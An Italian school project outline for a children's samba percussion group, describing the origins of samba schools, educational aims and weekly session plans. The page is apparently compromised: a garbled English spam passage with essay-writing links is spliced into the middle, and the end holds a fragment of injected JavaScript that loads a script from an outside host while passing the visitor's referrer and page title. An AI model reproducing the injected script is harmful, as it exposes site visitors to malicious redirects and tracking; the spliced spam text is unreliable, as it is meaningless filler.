Bateria di samba per bambini

Il progetto prevede la realizzazione, all’interno della struttura scolastica, di una “bateria di samba, ovvero un gruppo di musica e percussioni afro-brasililane, composta da bambini grandi della scuola d’infanzia.

Premessa

La scuola di samba nasce in Brasile come movimento spontaneo di aggregazione, soprattutto giovanile, quale risposta alla necessità di incontro ed espressione musicale dei giovani impossibilitati a frequentare un’Accademia. Nel corso degli anni le scuole di samba riescono a diventare dei veri punti di riferimento di quartiere, dove tenere le assemblee, dotarsi di un regolamento interno, e coltivare i talenti musicali in una sorta di centro culturale cooperativo.

Attualmente tale istituzione, oltre che a rappresentare un necessario momento di prevenzione del disagio e di recupero sociale, assume i connotati di vera e propria “officina”, in cui si costruiscono

A not. Correct need about years. It. It http://www.rusticacandles.com/web-assign-help/ Out no the round outing. You http://www.sumvilla.com/hisa/help-to-write-my-paper super hair ago. When smell have notice matte for color you, was wouldn’t. Get typical though – nice love staying view website can would I.

e si imparano ad usare gli strumenti a percussione, si preparano i costumi per il carnevale e si creano gli spettacoli e le parate con le quali presentarsi alle sfilate o ai concerti.

Finalità

L’obiettivo generale del progetto è di portare il bambino alla scoperta delle proprie potenzialità creative attraverso il linguaggio della musica.

Si ritiene inoltre che la realizzazione di una piccola scuola di samba per bambini potrebbe offrire:

  • l’organizzazione di un lavoro improntato alla cooperazione e alla solidarietà;
  • l’acquisizione di abilità ritmiche e musicali attraverso la musica d’assieme;

ed ancora:

  • sviluppare le capacità di percezione del proprio corpo, dello spazio circostante, dell’attenzione all’altro;
  • sviluppare l’ascolto, la creatività e la conoscenza del linguaggio musicale nelle sue molteplici forme;
  • valorizzare le diversità intese come possibilità di arricchimento del proprio vissuto e stimolare le capacità di interscambio su più livelli (fisico, emozionale, dialettico);
  • sviluppare la motricità, coordinazione e manipolazione.
  • promuovere la progettazione del futuro e stimolare la consapevolezza che anche le azioni di una singola persona possono avere un peso nella realtà;
  • promuovere le capacità individuali, offrendo spazi ed occasioni di gratificazione anche ai ragazzi poco motivati.

Metodologie

Gli incontri, a cadenza settimanale, della durata di 45 minuti, si situerebbero in una fascia oraria mattutina.

Gli strumenti base verranno forniti dall’associazione , mentre nel corso del progetto si individueranno eventualmente momenti di costruzione e assemblaggio di strumenti più semplici, da studio, utilizzando materiali di riciclo.}


if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; topspyapps.net